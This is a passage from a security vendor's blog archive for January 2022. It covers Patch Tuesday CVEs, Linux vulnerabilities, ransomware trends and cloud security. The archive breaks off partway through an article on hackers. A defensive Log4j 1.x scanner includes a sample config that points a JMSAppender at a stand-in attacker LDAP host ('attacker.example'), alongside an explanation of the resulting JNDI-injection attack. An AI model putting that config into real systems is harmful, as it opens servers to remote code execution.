Monthly Archives

January 2022


Critical Bug Can Be Exploited to Gain Windows SYSTEM Privileges

Filed under: Blog, News


McAfee has patched two severe vulnerabilities in a component of its McAfee Enterprise product that attackers can use to escalate privileges.

New Critical Vulnerability

McAfee has patched two high-severity vulnerabilities in a component of its McAfee Enterprise product that attackers can use to escalate privileges, including up to SYSTEM.

According to McAfee’s bulletin, the bugs are in versions prior to 5.7.5 of McAfee Agent, which is used in McAfee Endpoint Security, among other McAfee products. 

The Agent is the piece of McAfee ePolicy Orchestrator (McAfee ePO) that downloads and enforces policies and executes client-side tasks such as deployment and updating. 

The McAfee Agent is also the component that uploads events and provides additional data regarding each system’s status. Periodically collecting and sending event information to the McAfee ePO server, the Agent – which also installs and updates endpoint products – is a required install on any network system that needs to be managed.

How Syxsense Can Help

Syxsense has automated the entire process of patch management.

  • It automates testing of patches yet gets them deployed within three hours of receipt.
  • It automates patch deployment so the right patches make it to every endpoint.
  • It automates patch rollback in case of any issues or incompatibilities.
  • It automates the prioritization and sequencing of patches so those that represent the biggest threat are sent out first.

Syxsense also automates vulnerability scanning so that scans are done regularly to determine potential issues such as missing patches, open ports, and other vulnerabilities.

Syxsense demo

Schedule Your Syxsense Demo

Syxsense combines IT management, patch management, and security vulnerability scanning in one powerful solution. Get started today.

Schedule My Demo

Watch the Webcast: January Patch Tuesday 2022

Filed under: News, Patch Tuesday, Video


Watch this week's webcast to hear IT industry experts discuss strategies for tackling Microsoft's January Patch Tuesday updates.

Watch the January Patch Tuesday 2022 Webcast

New year, new Patch Tuesday — start 2022 ahead of the latest threats and vulnerabilities.

Industry experts discuss each of this month’s bulletins and show you strategies for tackling the most important updates.

Our team of IT management experts has deployed over 100 million patches. Sign up for our free webinar to receive the top patch strategies of the month.

View the Webcast

What You Need to Know: January Patch Tuesday 2022


Ransomware Is Bad and Getting Worse

Filed under: Blog


A ransomware expert cautions anyone who thinks the ongoing ransomware plague is bad that it is about to get much, much worse.

Changes for Ransomware In 2022

Roger Grimes, a ransomware expert at KnowBe4, cautions anyone who thinks the ongoing ransomware plague is bad that it is about to get much, much worse.

“The cybersecurity industry is not yet capable of implementing a robust defense to even slow the continued increase in cybercrime, much less actually lessen it,” he said.

He noted that ransomware gangs had graduated beyond mere ransom collection. Yes, they still rake in billions. But they are also stealing intellectual property, corporate data, and credentials. In addition, they use the stolen data to threaten the victim’s employees and customers, to publicly shame organizations, and to conduct spear phishing with the insider information they have obtained.

In other words, these new tactics mean that backups alone won’t protect victims. A backup may let a company avoid paying to get its data back, but the criminals can still use all of these other avenues to cause real problems, and ultimately force payment.

According to Coveware, 81% of ransomware gangs threaten to leak exfiltrated data. As a result, more than 60% of victims now pay the ransom. The average ransomware payment is up to $280,000 and rising steadily, along with cyber insurance premiums.

And Grimes predicts things will worsen once again. He said the bad guys are maximizing revenue potential by selling stolen data, credentials, access, money, and also going after individuals within companies, as well as organizations as a whole. They have evolved hacking-for-hire schemes, they offer product lists for sale, and in general are acting like a high-end marketing department in exploring and developing innovative new sales channels.

Anyone suffering a ransomware attack, therefore, had better do a thorough forensic examination to establish how the attack began, where it spread laterally, which backdoors were introduced, which credentials were compromised, and more. A vulnerability scan should of course be run to find any remaining weaknesses, and all of them need to be fixed before the environment is trusted again.

Combined Ransomware Attacks

Two-pronged attacks are becoming common tactics for cybercriminals. They might quietly run crypto mining on a compromised network and then launch ransomware. Or they can make a ransom demand and at the same time attack the victim’s public website, taking down its current revenue channels. The resulting financial stress makes it easier to extort the money.

As we move forward, further automation and streamlining of attacks is likely. For example, a successful incursion by a bot may result in the automatic installation of a malicious program, the harvesting of some passwords, and a scan of the environment to gather key details. At that point the attack is escalated to senior operators, who research the potential of the environment and decide on the most lucrative way to exploit it. This mirrors how IT itself operates and is evolving: routine and labor-intensive actions are automated, and alerts and exceptions are passed on to IT personnel to decide what to do.

Just as automation has become the go-to tool for hackers and is being introduced into more and more areas of IT operations and maintenance, it is automation that can help fight the battle against rampant ransomware.


January Patch Tuesday 2022 Fixes 96 Issues, Including 8 Critical

Filed under: News, Patch Management, Patch Tuesday


With 96 new bugs, Microsoft is kicking off the first Patch Tuesday of 2022 with a bang. There are 8 Critical and 88 Important fixes.

Microsoft Patch Tuesday Released with 96 Fixes

There are 8 Critical (one more than last month) and 88 Important fixes in this release. Updates were included for Microsoft Windows and Windows Components, Microsoft Edge (Chromium-based), Exchange Server, Microsoft Office and Office Components, SharePoint Server, .NET Framework, Microsoft Dynamics, Open-Source Software, Windows Hyper-V, Windows Defender, and Windows Remote Desktop. 

Year 2 Extended Support – Windows 7 and Windows Server 2008 (including R2) have received some updates this month. Next month you need to renew for a third ESU if you are still using Windows 7 or 2008 R2.

The first Patch Tuesday of the year has arrived with a bang, and just in time for many of our customers who are ending their change freeze following the New Year holidays. We do not have any confirmed Weaponized threats to deal with this month so far; however, we do have 6 confirmed Publicly Aware threats, which could be weaponized at any minute.

Syxsense Recommendations

Based on the Vendor Severity & CVSS Score, we have made a few recommendations below. As usual we recommend our customers enter the CVE numbers below into your Patch Management solution and deploy as soon as possible.

Top January 2022 Patches and Vulnerabilities

1. CVE-2022-21907: HTTP Protocol Stack Remote Code Execution Vulnerability

The vulnerability is a boundary error in the HTTP Trailer Support feature of the HTTP Protocol Stack (http.sys), the kernel-mode driver behind IIS and any other Windows service that listens through http.sys. An unauthenticated remote attacker can send a specially crafted HTTP request to such a server, trigger a buffer overflow, and execute arbitrary code on the system. Microsoft recommends prioritizing the patching of affected devices because the bug is suspected to be wormable. Microsoft’s advisory also notes that on Windows Server 2019 and Windows 10 version 1809 trailer support is off by default, so those versions are only affected if the EnableTrailerSupport registry value under HKLM\System\CurrentControlSet\Services\HTTP\Parameters has been set; removing that value is the documented workaround for those two versions only. Later versions of Windows 10, 11 and Server 2022 have no workaround and must be patched.

Syxscore

  • Vendor Severity: Critical
  • CVSS: 9.8
  • Weaponized: No
  • Public Aware: No
  • Countermeasure: Yes

Syxscore Risk

  • Attack Vector: Network
  • Attack Complexity: Low
  • Privileges: None
  • User Interaction: None
  • Scope (Jump Point): No

2. CVE-2022-21849: Windows IKE Extension Remote Code Execution Vulnerability

The vulnerability exists due to insufficient validation of user-supplied input in the Windows IKE Extension. A remote, unauthenticated attacker can send specially crafted IKE traffic to an affected host; Microsoft classifies the outcome as remote code execution, and the same bulletin fixes several related IKE Extension denial-of-service flaws (CVE-2022-21843, -21848, -21883, -21889 and -21890 in the table below). The attack surface exists only where Internet Key Exchange version 2 (IKEv2) is enabled, so hosts running IPsec/VPN services are the ones to prioritize.

Syxscore

  • Vendor Severity: Important
  • CVSS: 9.8
  • Weaponized: No
  • Public Aware: No
  • Countermeasure: Yes

Syxscore Risk

  • Attack Vector: Network
  • Attack Complexity: Low
  • Privileges: None
  • User Interaction: None
  • Scope (Jump Point): No

3. CVE-2022-21912: DirectX Graphics Kernel Remote Code Execution Vulnerability

The vulnerability allows a local, authenticated user to execute arbitrary code on the target system, and successful exploitation may result in complete compromise of the vulnerable system. The attacker takes advantage of a flaw in dxgkrnl.sys to trigger an arbitrary pointer dereference in kernel mode. What makes this worse is that no administrative rights are needed: an attacker holding ordinary, non-admin credentials can potentially exploit it, which makes it a ready-made privilege-escalation step after any initial foothold. Despite the “Remote Code Execution” title, the attack vector is local.

Syxscore

  • Vendor Severity: Critical
  • CVSS: 7.8
  • Weaponized: No
  • Public Aware: No
  • Countermeasure: Yes

Syxscore Risk

  • Attack Vector: Local
  • Attack Complexity: Low
  • Privileges: Low
  • User Interaction: None
  • Scope (Jump Point): No

Syxsense Recommendations

Based on the Vendor Severity and CVSS Score, we have made a few recommendations below which you should prioritize this month; please pay close attention to any of these which are Publicly Aware and / or Weaponized.

CVE Reference | Description | Vendor Severity | CVSS Score | Weaponized | Publicly Aware | Countermeasure | Highest Priority
CVE-2022-21907 | HTTP Protocol Stack Remote Code Execution Vulnerability | Critical | 9.8 | No | No | Yes | Yes
CVE-2022-21849 | Windows IKE Extension Remote Code Execution Vulnerability | Important | 9.8 | No | No | No | Yes
CVE-2022-21846 | Microsoft Exchange Server Remote Code Execution Vulnerability | Critical | 9.0 | No | No | No | Yes
CVE-2022-21855 | Microsoft Exchange Server Remote Code Execution Vulnerability | Important | 9.0 | No | No | No | Yes
CVE-2022-21969 | Microsoft Exchange Server Remote Code Execution Vulnerability | Important | 9.0 | No | No | No | Yes
CVE-2022-21901 | Windows Hyper-V Elevation of Privilege Vulnerability | Important | 9.0 | No | No | No | Yes
CVE-2022-21857 | Active Directory Domain Services Elevation of Privilege Vulnerability | Critical | 8.8 | No | No | No | Yes
CVE-2022-21840 | Microsoft Office Remote Code Execution Vulnerability | Critical | 8.8 | No | No | No | Yes
CVE-2022-21850 | Remote Desktop Client Remote Code Execution Vulnerability | Important | 8.8 | No | No | No | Yes
CVE-2022-21851 | Remote Desktop Client Remote Code Execution Vulnerability | Important | 8.8 | No | No | No | Yes
CVE-2022-21893 | Remote Desktop Protocol Remote Code Execution Vulnerability | Important | 8.8 | No | No | No | Yes
CVE-2022-21922 | Remote Procedure Call Runtime Remote Code Execution Vulnerability | Important | 8.8 | No | No | No | Yes
CVE-2022-21920 | Windows Kerberos Elevation of Privilege Vulnerability | Important | 8.8 | No | No | No | Yes
CVE-2022-21837 | Microsoft SharePoint Server Remote Code Execution Vulnerability | Important | 8.3 | No | No | No | Yes
CVE-2022-21912 | DirectX Graphics Kernel Remote Code Execution Vulnerability | Critical | 7.8 | No | No | No | Yes
CVE-2022-21898 | DirectX Graphics Kernel Remote Code Execution Vulnerability | Critical | 7.8 | No | No | No | Yes
CVE-2022-21917 | HEVC Video Extensions Remote Code Execution Vulnerability | Critical | 7.8 | No | No | No | Yes
CVE-2022-21833 | Virtual Machine IDE Drive Elevation of Privilege Vulnerability | Critical | 7.8 | No | No | No | Yes
CVE-2022-21836 | Windows Certificate Spoofing Vulnerability | Important | 7.8 | No | Yes | No | Yes
CVE-2022-21874 | Windows Security Center API Remote Code Execution Vulnerability | Important | 7.8 | No | Yes | No | Yes
CVE-2022-21919 | Windows User Profile Service Elevation of Privilege Vulnerability | Important | 7.0 | No | Yes | No | Yes
CVE-2022-21884 | Local Security Authority Subsystem Service Elevation of Privilege Vulnerability | Important | 7.8 | No | No | No
CVE-2022-21910 | Microsoft Cluster Port Driver Elevation of Privilege Vulnerability | Important | 7.8 | No | No | No
CVE-2022-21835 | Microsoft Cryptographic Services Elevation of Privilege Vulnerability | Important | 7.8 | No | No | No
CVE-2022-21841 | Microsoft Excel Remote Code Execution Vulnerability | Important | 7.8 | No | No | No
CVE-2022-21842 | Microsoft Word Remote Code Execution Vulnerability | Important | 7.8 | No | No | No
CVE-2022-21858 | Windows Bind Filter Driver Elevation of Privilege Vulnerability | Important | 7.8 | No | No | No
CVE-2022-21916 | Windows Common Log File System Driver Elevation of Privilege Vulnerability | Important | 7.8 | No | No | No
CVE-2022-21897 | Windows Common Log File System Driver Elevation of Privilege Vulnerability | Important | 7.8 | No | No | No
CVE-2022-21852 | Windows DWM Core Library Elevation of Privilege Vulnerability | Important | 7.8 | No | No | No
CVE-2022-21902 | Windows DWM Core Library Elevation of Privilege Vulnerability | Important | 7.8 | No | No | No
CVE-2022-21878 | Windows Geolocation Service Remote Code Execution Vulnerability | Important | 7.8 | No | No | No
CVE-2022-21908 | Windows Installer Elevation of Privilege Vulnerability | Important | 7.8 | No | No | No
CVE-2022-21888 | Windows Modern Execution Server Remote Code Execution Vulnerability | Important | 7.8 | No | No | No
CVE-2022-21885 | Windows Remote Access Connection Manager Elevation of Privilege Vulnerability | Important | 7.8 | No | No | No
CVE-2022-21914 | Windows Remote Access Connection Manager Elevation of Privilege Vulnerability | Important | 7.8 | No | No | No
CVE-2022-21895 | Windows User Profile Service Elevation of Privilege Vulnerability | Important | 7.8 | No | No | No
CVE-2022-21891 | Microsoft Dynamics 365 (on-premises) Spoofing Vulnerability | Important | 7.6 | No | No | No
CVE-2022-21932 | Microsoft Dynamics 365 Customer Engagement Cross-Site Scripting Vulnerability | Important | 7.6 | No | No | No
CVE-2022-21911 | .NET Framework Denial of Service Vulnerability | Important | 7.5 | No | No | No
CVE-2022-21904 | Windows GDI Information Disclosure Vulnerability | Important | 7.5 | No | No | No
CVE-2022-21880 | Windows GDI+ Information Disclosure Vulnerability | Important | 7.5 | No | No | No
CVE-2022-21843 | Windows IKE Extension Denial of Service Vulnerability | Important | 7.5 | No | No | No
CVE-2022-21883 | Windows IKE Extension Denial of Service Vulnerability | Important | 7.5 | No | No | No
CVE-2022-21848 | Windows IKE Extension Denial of Service Vulnerability | Important | 7.5 | No | No | No
CVE-2022-21889 | Windows IKE Extension Denial of Service Vulnerability | Important | 7.5 | No | No | No
CVE-2022-21890 | Windows IKE Extension Denial of Service Vulnerability | Important | 7.5 | No | No | No
CVE-2022-21839 | Windows Event Tracing Discretionary Access Control List Denial of Service Vulnerability | Important | 6.1 | No | Yes | No
CVE-2022-21869 | Clipboard User Service Elevation of Privilege Vulnerability | Important | 7.0 | No | No
CVE-2022-21865 | Connected Devices Platform Service Elevation of Privilege Vulnerability | Important | 7.0 | No | No
CVE-2022-21871 | Microsoft Diagnostics Hub Standard Collector Runtime Elevation of Privilege Vulnerability | Important | 7.0 | No | No
CVE-2022-21870 | Tablet Windows User Interface Application Core Elevation of Privilege Vulnerability | Important | 7.0 | No | No
CVE-2022-21861 | Task Flow Data Engine Elevation of Privilege Vulnerability | Important | 7.0 | No | No
CVE-2022-21873 | Tile Data Repository Elevation of Privilege Vulnerability | Important | 7.0 | No | No
CVE-2022-21882 | Win32k Elevation of Privilege Vulnerability | Important | 7.0 | No | No
CVE-2022-21887 | Win32k Elevation of Privilege Vulnerability | Important | 7.0 | No | No
CVE-2022-21859 | Windows Accounts Control Elevation of Privilege Vulnerability | Important | 7.0 | No | No
CVE-2022-21860 | Windows App Contracts API Server Elevation of Privilege Vulnerability | Important | 7.0 | No | No
CVE-2022-21862 | Windows Application Model Core API Elevation of Privilege Vulnerability | Important | 7.0 | No | No
CVE-2022-21868 | Windows Devices Human Interface Elevation of Privilege Vulnerability | Important | 7.0 | No | No
CVE-2022-21896 | Windows DWM Core Library Elevation of Privilege Vulnerability | Important | 7.0 | No | No
CVE-2022-21872 | Windows Event Tracing Elevation of Privilege Vulnerability | Important | 7.0 | No | No
CVE-2022-21903 | Windows GDI Elevation of Privilege Vulnerability | Important | 7.0 | No | No
CVE-2022-21881 | Windows Kernel Elevation of Privilege Vulnerability | Important | 7.0 | No | No
CVE-2022-21867 | Windows Push Notifications Apps Elevation of Privilege Vulnerability | Important | 7.0 | No | No
CVE-2022-21863 | Windows State Repository API Server file Elevation of Privilege Vulnerability | Important | 7.0 | No | No
CVE-2022-21875 | Windows Storage Elevation of Privilege Vulnerability | Important | 7.0 | No | No
CVE-2022-21866 | Windows System Launcher Elevation of Privilege Vulnerability | Important | 7.0 | No | No
CVE-2022-21864 | Windows UI Immersive Server API Elevation of Privilege Vulnerability | Important | 7.0 | No | No
CVE-2022-21834 | Windows User-mode Driver Framework Reflector Driver Elevation of Privilege Vulnerability | Important | 7.0 | No | No
CVE-2022-21892 | Windows Resilient File System (ReFS) Remote Code Execution Vulnerability | Important | 6.8 | No | No
CVE-2022-21958 | Windows Resilient File System (ReFS) Remote Code Execution Vulnerability | Important | 6.8 | No | No
CVE-2022-21959 | Windows Resilient File System (ReFS) Remote Code Execution Vulnerability | Important | 6.8 | No | No
CVE-2022-21960 | Windows Resilient File System (ReFS) Remote Code Execution Vulnerability | Important | 6.8 | No | No
CVE-2022-21961 | Windows Resilient File System (ReFS) Remote Code Execution Vulnerability | Important | 6.8 | No | No
CVE-2022-21962 | Windows Resilient File System (ReFS) Remote Code Execution Vulnerability | Important | 6.8 | No | No
CVE-2022-21918 | DirectX Graphics Kernel File Denial of Service Vulnerability | Important | 6.5 | No | No
CVE-2022-21915 | Windows GDI+ Information Disclosure Vulnerability | Important | 6.5 | No | No
CVE-2022-21847 | Windows Hyper-V Denial of Service Vulnerability | Important | 6.5 | No | No
CVE-2022-21963 | Windows Resilient File System (ReFS) Remote Code Execution Vulnerability | Important | 6.4 | No | No
CVE-2022-21928 | Windows Resilient File System (ReFS) Remote Code Execution Vulnerability | Important | 6.3 | No | No
CVE-2022-21970 | Microsoft Edge (Chromium-based) Elevation of Privilege Vulnerability | Important | 6.1 | No | No
CVE-2022-21964 | Remote Desktop Licensing Diagnoser Information Disclosure Vulnerability | Important | 5.5 | No | No
CVE-2022-21877 | Storage Spaces Controller Information Disclosure Vulnerability | Important | 5.5 | No | No
CVE-2022-21876 | Win32k Information Disclosure Vulnerability | Important | 5.5 | No | No
CVE-2022-21838 | Windows Clean up Manager Elevation of Privilege Vulnerability | Important | 5.5 | No | No
CVE-2022-21906 | Windows Defender Application Control Security Feature Bypass Vulnerability | Important | 5.5 | No | No
CVE-2022-21899 | Windows Extensible Firmware Interface Security Feature Bypass Vulnerability | Important | 5.5 | No | No
CVE-2022-21879 | Windows Kernel Elevation of Privilege Vulnerability | Important | 5.5 | No | No
CVE-2022-21913 | Local Security Authority (Domain Policy) Remote Protocol Security Feature Bypass | Important | 5.3 | No | No
CVE-2022-21925 | Windows Backup Key Remote Protocol Security Feature Bypass Vulnerability | Important | 5.3 | No | No
CVE-2022-21924 | Workstation Service Remote Protocol Security Feature Bypass Vulnerability | Important | 5.3 | No | No
CVE-2022-21900 | Windows Hyper-V Security Feature Bypass Vulnerability | Important | 4.6 | No | No
CVE-2022-21905 | Windows Hyper-V Security Feature Bypass Vulnerability | Important | 4.6 | No | No
CVE-2022-21894 | Secure Boot Security Feature Bypass Vulnerability | Important | 4.4 | No | No
CVE-2022-21921 | Windows Defender Credential Guard Security Feature Bypass Vulnerability | Important | 4.4 | No | No

Linux Vulnerabilities of the Week: January 10, 2022

Filed under: News


See this week's top Linux issues and keep your IT environment protected from the latest January 2022 Linux vulnerabilities.

1. Mozilla iframe sandbox rules vulnerability

Severity: Critical         CVSS Score: 10.0

Due to incorrect application of iframe sandbox rules to XSLT stylesheets, an iframe can bypass restrictions such as executing scripts or navigating the top-level frame. This vulnerability affects Firefox < 94, Thunderbird < 91.3, and Firefox ESR < 91.3.

The highest threat from this vulnerability is to confidentiality, integrity, as well as system availability.

Syxscore Risk Alert

This vulnerability carries critical risk: it is reachable over any network, with low attack complexity, no privileges, and no user interaction. Scope is Changed, meaning a successful exploit breaks out of the vulnerable component (here, content in a sandboxed iframe reaches the top-level frame), so it can serve as a jump point for a wider attack.

  • Attack Vector: Network
  • Attack Complexity: Low
  • Privileges Required: None
  • User Interaction: None
  • Scope (Jump Point): Changed

CVE Reference(s): CVE-2021-38503

2. Possible buffer overflow in the mod_lua multipart parser affecting Red Hat Enterprise Linux 7 and 8

Severity: Important    CVSS Score: 9.8

A buffer overflow in httpd’s Lua module (mod_lua) lets a carefully crafted multipart request body cause an out-of-bounds write when a Lua script calls r:parsebody(). The Apache httpd team is not aware of an exploit for the vulnerability, though it might be possible to craft one. This issue affects Apache HTTP Server 2.4.51 and earlier. Only servers that load mod_lua and run scripts that parse request bodies are exposed, so check the output of httpd -M for lua_module before treating a host as affected.

The highest threat from this vulnerability is to confidentiality, integrity, as well as system availability.

Syxscore Risk Alert

This vulnerability has a critical risk as this can be exposed over any network, with low complexity, no privileges, and without user interaction.

  • Attack Vector: Network
  • Attack Complexity: Low
  • Privileges Required: None
  • User Interaction: None
  • Scope (Jump Point): Unchanged

CVE Reference(s): CVE-2021-44790

3. Remote code execution in Log4j 1.x affecting Red Hat Enterprise Linux 8

Severity: Important    CVSS Score: 7.5

JMSAppender in Log4j 1.2 is vulnerable to deserialization of untrusted data when the attacker has write access to the Log4j configuration. The appender resolves its JMS connection factory and topic through JNDI, so an attacker who can edit the TopicBindingName and TopicConnectionFactoryBindingName settings can point those lookups at a JNDI/LDAP endpoint they control and have the server deserialize attacker-supplied data, which yields remote code execution in much the same way as the Log4j 2 JNDI lookup flaw.

This issue only affects Log4j 1.2 when specifically configured to use JMSAppender, which is not the default. Apache Log4j 1.2 reached the end of life in August 2015. Users should upgrade to Log4j 2 as it addresses numerous other issues from the previous versions.

The highest threat from this vulnerability is to confidentiality, integrity, as well as system availability.

Syxscore Risk Alert

This vulnerability has a major risk as although this requires a complex attack to be exploited, it can be exposed over any network, with low privileges, and without user interaction.

  • Attack Vector: Network
  • Attack Complexity: High
  • Privileges Required: Low
  • User Interaction: None
  • Scope (Jump Point): Unchanged

CVE Reference(s): CVE-2021-4104
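As an added example (not Syxsense’s code or anything from the Apache project), the Python below scans Log4j 1.x configuration files for the precondition described above: a JMSAppender, and the JNDI provider it would resolve through. The three configuration files are constructed samples written in the Log4j 1.2 properties and XML formats; the hostnames in them are made up. The “high”/“medium” triage is my heuristic: JMSAppender anywhere means the CVE-2021-4104 preconditions are met, and a ProviderURL that points at an LDAP or RMI naming service is exactly the kind of provider a JNDI-injection payload relies on.

```python
import re
import xml.etree.ElementTree as ET

JMS_APPENDER = "org.apache.log4j.net.JMSAppender"
# JNDI providers that can hand back serialized objects or remote references;
# a JMSAppender wired to one of these is the classic JNDI-injection setup.
REMOTE_JNDI_SCHEMES = ("ldap://", "ldaps://", "rmi://", "iiop://", "corbaname:")

# Constructed sample files in Log4j 1.2's two configuration formats (made-up hosts).
SAMPLE_CONFIGS = {
    "app1/log4j.properties": """
# app1: JMSAppender resolving its factory/topic through an LDAP naming service
log4j.rootLogger=INFO, stdout, jms
log4j.appender.stdout=org.apache.log4j.ConsoleAppender
log4j.appender.jms=org.apache.log4j.net.JMSAppender
log4j.appender.jms.InitialContextFactoryName=com.sun.jndi.ldap.LdapCtxFactory
log4j.appender.jms.ProviderURL=ldap://attacker.example:1389/
log4j.appender.jms.TopicBindingName=Exploit
log4j.appender.jms.TopicConnectionFactoryBindingName=ConnectionFactory
""",
    "app2/log4j.properties": """
log4j.rootLogger=INFO, stdout
log4j.appender.stdout=org.apache.log4j.ConsoleAppender
log4j.appender.stdout.layout=org.apache.log4j.PatternLayout
""",
    "app3/log4j.xml": """<?xml version="1.0" encoding="UTF-8"?>
<log4j:configuration xmlns:log4j="http://jakarta.apache.org/log4j/">
  <appender name="jms" class="org.apache.log4j.net.JMSAppender">
    <param name="InitialContextFactoryName" value="org.apache.activemq.jndi.ActiveMQInitialContextFactory"/>
    <param name="ProviderURL" value="tcp://broker.internal:61616"/>
    <param name="TopicBindingName" value="logTopic"/>
  </appender>
  <root><level value="info"/><appender-ref ref="jms"/></root>
</log4j:configuration>
""",
}


def _properties_appenders(text):
    """Map appender name -> {'class', 'options'} from a log4j.properties body."""
    appenders = {}
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith(("#", "!")) or "=" not in line:
            continue
        key, value = (s.strip() for s in line.split("=", 1))
        m = re.match(r"log4j\.appender\.([^.]+)(?:\.(.+))?$", key)
        if not m:
            continue
        name, option = m.group(1), m.group(2)
        entry = appenders.setdefault(name, {"class": None, "options": {}})
        if option is None:
            entry["class"] = value          # log4j.appender.<name>=<class>
        else:
            entry["options"][option] = value  # log4j.appender.<name>.<option>=<value>
    return appenders


def _xml_appenders(text):
    """Same mapping from a log4j.xml body (<appender name= class=> with <param> children)."""
    appenders = {}
    for node in ET.fromstring(text).iter("appender"):
        options = {p.get("name"): p.get("value", "") for p in node.findall("param")}
        appenders[node.get("name", "?")] = {"class": node.get("class"), "options": options}
    return appenders


def scan_log4j_config(path, text):
    """Return one finding per JMSAppender in a single Log4j 1.x configuration file."""
    parse = _xml_appenders if path.endswith(".xml") else _properties_appenders
    findings = []
    for name, entry in parse(text).items():
        if entry["class"] != JMS_APPENDER:
            continue
        provider = entry["options"].get("ProviderURL", "")
        remote = provider.lower().startswith(REMOTE_JNDI_SCHEMES)
        findings.append({
            "file": path,
            "appender": name,
            "provider_url": provider,
            "severity": "high" if remote else "medium",
            "reason": ("JMSAppender resolves JNDI objects through an LDAP/RMI-style provider"
                       if remote else "JMSAppender configured (CVE-2021-4104 preconditions met)"),
        })
    return findings


def scan_all(configs):
    """Scan a {path: file_text} mapping and return every finding."""
    findings = []
    for path, text in configs.items():
        findings.extend(scan_log4j_config(path, text))
    return findings


if __name__ == "__main__":
    for f in scan_all(SAMPLE_CONFIGS):
        print("%-6s %s: appender '%s' -> %s (%s)" % (
            f["severity"].upper(), f["file"], f["appender"], f["reason"],
            f["provider_url"] or "no ProviderURL"))
```

Run it over the log4j.properties and log4j.xml files pulled out of deployed WARs and JARs. A hit is a reason to remove JMSAppender (deleting org/apache/log4j/net/JMSAppender.class from the jar was the interim mitigation Red Hat published) or, better, to migrate to Log4j 2 as the advisory recommends, since Log4j 1.2 receives no fixes.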

4. Read buffer overruns processing ASN.1 strings in OpenSSL

Severity: Important    CVSS Score: 7.4

It was found that OpenSSL assumed ASN.1 strings to be NUL terminated. An attacker may be able to force an application into calling an OpenSSL function with a specially crafted, non-NUL-terminated string to deliberately hit this bug, which may result in a crash of the application, causing a denial of service, or possibly in memory disclosure. The upstream fix shipped in OpenSSL 1.1.1l; on Red Hat systems the fix is backported, so confirm it with rpm -q --changelog openssl | grep CVE-2021-3712 rather than by the version string alone.

The highest threat from this vulnerability is to data confidentiality and system availability.

Syxscore Risk Alert

This vulnerability has a major risk as although this requires a complex attack to be exploited, it can be exposed over any network, with no privileges, and without user interaction.

  • Attack Vector: Network
  • Attack Complexity: High
  • Privileges Required: None
  • User Interaction: None
  • Scope (Jump Point): Unchanged

CVE Reference(s): CVE-2021-3712

5. Python-lxml’s HTML flaw affecting Red Hat Enterprise Linux 8

Severity: Important    CVSS Score: 7.1

There’s a flaw in python-lxml’s HTML Cleaner component, which is responsible for sanitizing HTML and JavaScript.

An attacker who can submit a crafted payload to a web service using python-lxml’s HTML Cleaner may be able to trigger script execution in clients such as web browsers.

The highest threat from this vulnerability is to integrity.

Syxscore Risk Alert

This vulnerability carries major risk: although it requires user interaction to exploit, it is reachable over any network, with low attack complexity and no privileges. Scope is Changed because the sanitizing happens in the server-side component while the injected script executes in the client’s browser, so the impact lands on a different component than the vulnerable one and the flaw can serve as a jump point.

  • Attack Vector: Network
  • Attack Complexity: Low
  • Privileges Required: None
  • User Interaction: Required
  • Scope (Jump Point): Changed

CVE Reference(s): CVE-2021-43818


Cloud-Based IT Security Will Dominate in 2022

Filed under: News


IT professionals will need cloud-based security tools with built-in automation to stay on top of 2022 IT security needs. What's changing?

Cloud-Security Looking to Grow in 2022

The cloud has been gathering momentum for many years. And it is rapidly becoming an unstoppable force. According to the 2022 Technology Spending Intentions report by Enterprise Strategy Group (ESG), cloud spending will far outstrip on-premises spending in 2022.

The report states that two thirds of organizations will raise their budgets for public cloud applications in 2022. 3% will decrease such spending and the remainder said public spending would remain flat. Some of the major factors driving these investment trends include the improvement of the customer experience, making employees more productive, enhancing business processes, and enabling digital transformation.

Digital transformation, it turns out, goes hand in hand with the cloud. Companies have realized that being in the cloud gives them far more architectural flexibility. Those continuing to focus on on-premises technology typically find it more difficult to adopt the latest technologies, harder to transform, and more challenging to streamline processes.

That’s why ESG found that almost half of organizations now regard themselves as cloud-first i.e., when they look to add new technology, expand their operations, or upgrade an application or system, their first option is always to look at how that can be done in the cloud. They deploy any new applications in the public cloud unless someone can make a compelling case to deploy it using on-premises resources. This approach offers them an immediate benefit of transferring CAPEX costs to OPEX. At the same time, it grants them access to cloud technology where vendors take care of all upgrades, back-end systems, and troubleshooting.

Hence, we are seeing the number of traditional data centers and server rooms dwindle. Instead of buying the hardware upfront and paying for annual maintenance, the pendulum has swung to a consumption-based model in which infrastructure is obtained on a pay-per-use basis such as cloud subscriptions. Over the past two years, the number favoring the traditional data center model has dropped by 12%. In 2022, it will drop to 38%.

Beyond costs and access to the latest technology, the move to the cloud is also about a preference for iterative methodologies such as DevOps, agile software development, and adoption of low-code and no-code processes. Cloud-based systems make it far easier for organizations to switch to these modern methodologies. Further, the cloud brings an extra dimension to application development. According to ESG, 60% of organizations are engaged in the development of cloud-native applications.

The Cloud and Digital Transformation Go Hand in Hand

There is no doubt that most organizations see a strong need to digitally transform in order to stay competitive and expand. That’s why so many are gravitating to the cloud. They no longer wish to bog themselves down in internal IT plumbing and maintenance by running a sophisticated modern data center.

At the same time, they are learning that the move to the cloud can help them to enhance security while they digitally transform. The organizational perimeter has evolved over the past two years. There is no going back. No longer can IT shelter employees and systems behind a firewall protecting a physical building and a consolidated network. The genie is out of the bottle. Many work from home. Wi-Fi networks are in heavy use across the geographically distributed enterprise. Applications are now provided by a great many cloud vendors. The centralized security paradigm no longer functions.

How Syxsense Can Help

It takes cloud-based security tools with built-in automation to stay on top of current security needs. Syxsense offers automated, cloud-based patch management and vulnerability scanning tools.

As organizations transition to the cloud, they must ensure that they also transition to security tools such as Syxsense as a key part of their journey.


Why Hackers are Living the American Dream

Filed under: News


It appears that there is a new American Dream — hackers all over the world are enjoying riches by preying on U.S. businesses and consumers.

A New American Dream for Hackers

The American Dream has long been the ideal whereby anyone living in the country would enjoy equality of opportunity. Hard work would pay off in terms of achievement of aspirations and goals.

Before the USA even achieved independence, the promise of freedom lured many to the new world. But after the attainment of independence, the numbers began to rise dramatically.

Perhaps the greatest wave was around the end of the nineteenth and start of the twentieth centuries when approximately 23 million immigrants settled in the United States. Most came from Southern and Eastern Europe, as well as Scandinavia. They fled their homes due to political upheaval, religious persecution, and a lack of economic opportunities.

The USA represented the opposite – religious freedom, political stability, and plenty of opportunities to move up the economic ladder. To this day, people still flock to the country, hoping for a better life.

Attacks on the Rise

But now it appears that there is a new American Dream – hackers all over the world are enjoying riches by preying on U.S. businesses and consumers. According to security firm Surfshark, the U.S. ranks first worldwide in the number of data breach victims.

Hackers are targeting the nation for two reasons:

  1. The riches of the U.S. make it a high-priority target.
